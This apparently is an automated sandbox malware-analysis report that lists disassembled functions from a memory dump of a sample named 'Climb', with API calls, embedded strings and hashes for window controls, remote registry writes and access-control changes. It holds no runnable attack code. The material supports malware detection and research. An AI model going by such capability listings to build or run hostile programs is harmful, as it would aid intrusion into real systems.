IsWindowVisible.USER32(00000000), ref: 00581D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00581D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00581D6C
GetWindowRect.USER32(00000000,?), ref: 00581D84
MonitorFromPoint.USER32(?,?,00000002), ref: 00581DAA
GetMonitorInfoW.USER32(00000000,?), ref: 00581DC4
CopyRect.USER32(?,?), ref: 00581DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 00581E46

Strings

tooltips_class32, xrefs: 00581C82
0, xrefs: 00581B6F
(, xrefs: 00581DB7

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: f310fabb9159a0e4be2872ae53a629181472b9c02b0d4e22ca558600f61c2f72
Instruction ID: 95e5a2d2093035ac6903b04e9aea247cb87ce9d14eb6c4a434b803f34ad9e610
Opcode Fuzzy Hash: f310fabb9159a0e4be2872ae53a629181472b9c02b0d4e22ca558600f61c2f72
Instruction Fuzzy Hash: 83B19C71604701AFD704EF65C984B6ABFE9FF84310F00891DF999AB2A1D771E805CBA6

Function 00580CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00580D81
_wcslen.LIBCMT ref: 00580DBB
_wcslen.LIBCMT ref: 00580E25
_wcslen.LIBCMT ref: 00580E8D
_wcslen.LIBCMT ref: 00580F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00580F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00580FA0

Part of subcall function 0050FD52: _wcslen.LIBCMT ref: 0050FD5D

Part of subcall function 00552B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00552BA5
Part of subcall function 00552B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00552BD7

Strings

GETITEMCOUNT, xrefs: 00580DB2, 00580DD3
SELECTCLEAR, xrefs: 00580FC9
ISSELECTED, xrefs: 00580F79
VIEWCHANGE, xrefs: 00581111
DESELECT, xrefs: 00581038
GETTEXT, xrefs: 00580E88, 00580EA3
FINDITEM, xrefs: 005810C3
GETSELECTEDCOUNT, xrefs: 00580F0C, 00580F27
SELECTALL, xrefs: 00580FB1
GETSELECTED, xrefs: 0058107D
GETSUBITEMCOUNT, xrefs: 00580E20, 00580E3B
SELECT, xrefs: 00580FE4
SELECTINVERT, xrefs: 0058101A

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: eeabcd2a56c621350eb5d943581ed63ad8b7abd885ac3dda9a712f80607b3ea8
Instruction ID: 1453e9e1747a36e88d78d718b936a8d42e55b597f4d1c2f19b55d175f788555d
Opcode Fuzzy Hash: eeabcd2a56c621350eb5d943581ed63ad8b7abd885ac3dda9a712f80607b3ea8
Instruction Fuzzy Hash: 6EE1D1312046418FC754EF24C95187ABBEAFF84314B14895DF896AB7E1DB30ED49CB91

Function 005516D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00551A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00551A60
Part of subcall function 00551A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A6C
Part of subcall function 00551A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A7B
Part of subcall function 00551A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A82
Part of subcall function 00551A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00551A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00551741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00551775
GetLengthSid.ADVAPI32(?), ref: 0055178C
GetAce.ADVAPI32(?,00000000,?), ref: 005517C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005517E2
GetLengthSid.ADVAPI32(?), ref: 005517F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00551801
HeapAlloc.KERNEL32(00000000), ref: 00551808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00551829
CopySid.ADVAPI32(00000000), ref: 00551830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0055185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00551881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00551893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 005518BA
HeapFree.KERNEL32(00000000), ref: 005518C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 005518CA
HeapFree.KERNEL32(00000000), ref: 005518D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 005518DA
HeapFree.KERNEL32(00000000), ref: 005518E1
GetProcessHeap.KERNEL32(00000000,?), ref: 005518ED
HeapFree.KERNEL32(00000000), ref: 005518F4

Part of subcall function 00551ADF: GetProcessHeap.KERNEL32(00000008,005514FD,?,00000000,?,005514FD,?), ref: 00551AED
Part of subcall function 00551ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,005514FD,?), ref: 00551AF4
Part of subcall function 00551ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,005514FD,?), ref: 00551B03

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 14e14c5c2d6d2dd64e6f7a24fd284b46968d4060d83521ffa12697d0d05ebd70
Instruction ID: 781ecc525e61f3d1d26023924a08bc36ce721a6cc7b0a3848db74a7f83b545d9
Opcode Fuzzy Hash: 14e14c5c2d6d2dd64e6f7a24fd284b46968d4060d83521ffa12697d0d05ebd70
Instruction Fuzzy Hash: 62715AB2D0060AABDB20DFA5DC48FAEBFB8FF44351F144126ED15A6190E7319A09CB64

Function 0057CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0057CF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,0058DCD0,00000000,?,00000000,?,?), ref: 0057CFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0057D004
_wcslen.LIBCMT ref: 0057D054
_wcslen.LIBCMT ref: 0057D0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0057D112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0057D221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0057D2AD
RegCloseKey.ADVAPI32(?), ref: 0057D2E1
RegCloseKey.ADVAPI32(00000000), ref: 0057D2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0057D3C0

Strings

REG_MULTI_SZ, xrefs: 0057D155
REG_QWORD, xrefs: 0057D323
REG_DWORD, xrefs: 0057D264
REG_SZ, xrefs: 0057D0A4
REG_BINARY, xrefs: 0057D373
REG_EXPAND_SZ, xrefs: 0057D02D

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: e234e4400cfdc2cd131063ffc8fe348a147560d5b8bf58926b5828b3c681ff61
Instruction ID: 264881c70d0b74f0bafa0fe99d2f75571ba92efc27e3ec8589ae19856b94de0d
Opcode Fuzzy Hash: e234e4400cfdc2cd131063ffc8fe348a147560d5b8bf58926b5828b3c681ff61
Instruction Fuzzy Hash: 66129A356042059FDB14DF15D885A2ABBF5FF88718F04885DF98A9B3A2CB34EC42CB95

Function 005813BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00581462
_wcslen.LIBCMT ref: 0058149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005814F0
_wcslen.LIBCMT ref: 00581526
_wcslen.LIBCMT ref: 005815A2
_wcslen.LIBCMT ref: 0058161D

Part of subcall function 0050FD52: _wcslen.LIBCMT ref: 0050FD5D

Part of subcall function 00553535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00553547

Strings

ISCHECKED, xrefs: 0058177D
GETITEMCOUNT, xrefs: 005816BA
EXPAND, xrefs: 00581694
GETSELECTED, xrefs: 005816EA
EXISTS, xrefs: 00581618, 00581633
GETTOTALCOUNT, xrefs: 0058148E, 005814B3
UNCHECK, xrefs: 005817DA
CHECK, xrefs: 00581521, 0058153C
GETTEXT, xrefs: 00581733
COLLAPSE, xrefs: 0058159D, 005815B8
SELECT, xrefs: 005817AD

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: e6e15986af3b95da5fc13fbbbbe097e49c6bb4708ad7f83ef2282698a3dce164
Instruction ID: 58578fbbdac795fc9151c74788dcd66ccdb44625774e713d79d07b756799619a
Opcode Fuzzy Hash: e6e15986af3b95da5fc13fbbbbe097e49c6bb4708ad7f83ef2282698a3dce164
Instruction Fuzzy Hash: 19E1AD316047028FCB14EF25C45186ABBEAFFD4314B14895DF896AB7A2DB30ED46CB85

Function 0057D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0057C10E,?,?), ref: 0057D415
_wcslen.LIBCMT ref: 0057D451
_wcslen.LIBCMT ref: 0057D4C8
_wcslen.LIBCMT ref: 0057D4FE
_wcslen.LIBCMT ref: 0057D559
_wcslen.LIBCMT ref: 0057D58F
_wcslen.LIBCMT ref: 0057D5DF

Strings

HKEY_CURRENT_CONFIG, xrefs: 0057D5D9, 0057D5DE
HKU, xrefs: 0057D650
HKEY_CURRENT_USER, xrefs: 0057D61D
HKCC, xrefs: 0057D60C
HKEY_LOCAL_MACHINE, xrefs: 0057D4C2, 0057D4C7
HKCR, xrefs: 0057D589, 0057D58E
HKCU, xrefs: 0057D62E
HKEY_CLASSES_ROOT, xrefs: 0057D553, 0057D558
HKLM, xrefs: 0057D4F8, 0057D4FD
HKEY_USERS, xrefs: 0057D63F

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: c2c41f09fdf8110b8a426a9f814551ee2ed2bb316dfcb1072e581847ca5be5ba
Instruction ID: 9fcb8bbf442ec0d636ac44081cdc0266385e49b0cc644f0cd45c7580b89ba2ce
Opcode Fuzzy Hash: c2c41f09fdf8110b8a426a9f814551ee2ed2bb316dfcb1072e581847ca5be5ba
Instruction Fuzzy Hash: 1D71F97360012A8BCF109E38E9415FA3FB6BF60758B218524E85D97294EA35DD44E7B0

Function 00588D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00588DB5
_wcslen.LIBCMT ref: 00588DC9
_wcslen.LIBCMT ref: 00588DEC
_wcslen.LIBCMT ref: 00588E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00588E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00586691), ref: 00588EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00588EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00588F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00588F5C
FreeLibrary.KERNEL32(?), ref: 00588F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00588F78
DestroyIcon.USER32(?,?,?,?,?,00586691), ref: 00588F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00588FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00588FB0

Strings

.icl, xrefs: 00588DC3
.dll, xrefs: 00588E06
.exe, xrefs: 00588DE3

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: a70e0d0a40bdb74830c27d4fa5f7ca2c078cd5862cd0877e5267701f24f4cd2d
Instruction ID: f89bf12efd4c1f9b21bd3b50a220ba77e9ef9a1f64b731dcc92bdcbcb4204f5d
Opcode Fuzzy Hash: a70e0d0a40bdb74830c27d4fa5f7ca2c078cd5862cd0877e5267701f24f4cd2d
Instruction Fuzzy Hash: AB61FF71900209BAEB14EF64CC46BBE7BACFF08B10F50450AFD15E60D1DB74A984DBA0

Function 005648BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0056493D
_wcslen.LIBCMT ref: 00564948
_wcslen.LIBCMT ref: 0056499F
_wcslen.LIBCMT ref: 005649DD
GetDriveTypeW.KERNEL32(?), ref: 00564A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00564A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00564A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00564ACC

Strings

closed, xrefs: 0056494D, 00564972, 0056498B, 005649C3, 005649DC
open , xrefs: 00564A2A
wait, xrefs: 00564A89
type cdaudio alias cd wait, xrefs: 00564A46
close, xrefs: 00564943, 0056495D
set cd door , xrefs: 00564A6D
open, xrefs: 00564999, 0056499E
close cd wait, xrefs: 00564AB7

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 5eebb2e1e57db5a55cd347362113c90f9263f97470aea553a1da08c714aa5b8f
Instruction ID: 872bf6fd23e5158b9c6084b0bc875ae16c164f8c036c183b26810c088982d3b0
Opcode Fuzzy Hash: 5eebb2e1e57db5a55cd347362113c90f9263f97470aea553a1da08c714aa5b8f
Instruction Fuzzy Hash: 3671E13250820A9FC710EF25C84097BBBE5FF98758F10492EF89697261EB34ED45CB91

Function 00556382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00556395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 005563A7
SetWindowTextW.USER32(?,?), ref: 005563BE
GetDlgItem.USER32(?,000003EA), ref: 005563D3
SetWindowTextW.USER32(00000000,?), ref: 005563D9
GetDlgItem.USER32(?,000003E9), ref: 005563E9
SetWindowTextW.USER32(00000000,?), ref: 005563EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00556410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0055642A
GetWindowRect.USER32(?,?), ref: 00556433
_wcslen.LIBCMT ref: 0055649A
SetWindowTextW.USER32(?,?), ref: 005564D6
GetDesktopWindow.USER32 ref: 005564DC
GetWindowRect.USER32(00000000), ref: 005564E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0055653A
GetClientRect.USER32(?,?), ref: 00556547
PostMessageW.USER32(?,00000005,00000000,?), ref: 0055656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00556596

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 615a86c0bd327e4fb1ff713c5d49e0314f1a8fbbc6494adec8ea9b877aa5cb93
Instruction ID: 6a5e3e7b0bcc874d03635f59e0e9a439bc1320cab4120d2bb68cdae1ad8a4a13
Opcode Fuzzy Hash: 615a86c0bd327e4fb1ff713c5d49e0314f1a8fbbc6494adec8ea9b877aa5cb93
Instruction Fuzzy Hash: A871BF31900749EFDB20DFA8CE95AAEBBF5FF48705F500919E986A35A0D770E948CB10

Function 0057086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00570884
LoadCursorW.USER32(00000000,00007F8A), ref: 0057088F
LoadCursorW.USER32(00000000,00007F00), ref: 0057089A
LoadCursorW.USER32(00000000,00007F03), ref: 005708A5
LoadCursorW.USER32(00000000,00007F8B), ref: 005708B0
LoadCursorW.USER32(00000000,00007F01), ref: 005708BB
LoadCursorW.USER32(00000000,00007F81), ref: 005708C6
LoadCursorW.USER32(00000000,00007F88), ref: 005708D1
LoadCursorW.USER32(00000000,00007F80), ref: 005708DC
LoadCursorW.USER32(00000000,00007F86), ref: 005708E7
LoadCursorW.USER32(00000000,00007F83), ref: 005708F2
LoadCursorW.USER32(00000000,00007F85), ref: 005708FD
LoadCursorW.USER32(00000000,00007F82), ref: 00570908
LoadCursorW.USER32(00000000,00007F84), ref: 00570913
LoadCursorW.USER32(00000000,00007F04), ref: 0057091E
LoadCursorW.USER32(00000000,00007F02), ref: 00570929
GetCursorInfo.USER32(?), ref: 00570939
GetLastError.KERNEL32 ref: 0057097B

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 9eba97fc45dd2fc89b4bc680bfb0809bde0f1ff6621eb6cf0f19393323fab8f8
Instruction ID: dd173acd99eacfbd8d4e388a90884efecc5d5aaeb27068a0320b9d681d9b9108
Opcode Fuzzy Hash: 9eba97fc45dd2fc89b4bc680bfb0809bde0f1ff6621eb6cf0f19393323fab8f8
Instruction Fuzzy Hash: B0414770D08319AADB109FB69C8986EBFE8FF44754B50452AE11CE7291D678D901CF91

Function 00553A43 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00553AD9
_wcslen.LIBCMT ref: 00553B44

Strings

REGEXPCLASS, xrefs: 00553BA1, 00553BB2
TEXT, xrefs: 00553DC8
CLASSNN, xrefs: 00553B3F, 00553B50
k[, xrefs: 00553CE6
CLASS, xrefs: 00553AD4, 00553AF1
INSTANCE, xrefs: 00553D9F
NAME, xrefs: 00553C81, 00553C92

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k[
API String ID: 176396367-3284265457
Opcode ID: 50a8572b50418cbd5cb00e71ecd9edd05ad049fbdd12b7c062ad52df3c6c7fd3
Instruction ID: bee0fb287b7799b06b1f438f9c4bc0e29d3d2f3b40ee12d80c8a31e8536ed974
Opcode Fuzzy Hash: 50a8572b50418cbd5cb00e71ecd9edd05ad049fbdd12b7c062ad52df3c6c7fd3
Instruction Fuzzy Hash: 3BE1E332A00516ABCB149FB4C8626EDFFB5BF54791F10412BE85AE7250DB30AE8D9790

Function 00589B7A Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0

DragQueryPoint.SHELL32(?,?), ref: 00589BA3

Part of subcall function 005880AE: ClientToScreen.USER32(?,?), ref: 005880D4
Part of subcall function 005880AE: GetWindowRect.USER32(?,?), ref: 0058814A
Part of subcall function 005880AE: PtInRect.USER32(?,?,?), ref: 0058815A

SendMessageW.USER32(?,000000B0,?,?), ref: 00589C0C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00589C17
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00589C3A
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00589C81
SendMessageW.USER32(?,000000B0,?,?), ref: 00589C9A
SendMessageW.USER32(?,000000B1,?,?), ref: 00589CB1
SendMessageW.USER32(?,000000B1,?,?), ref: 00589CD3
DragFinish.SHELL32(?), ref: 00589CDA
DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00589DCD

Strings

(\, xrefs: 00589B8C
@GUI_DRAGFILE, xrefs: 00589D7C
@GUI_DRAGID, xrefs: 00589D45
(\, xrefs: 00589DAB
@GUI_DROPID, xrefs: 00589CFA

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
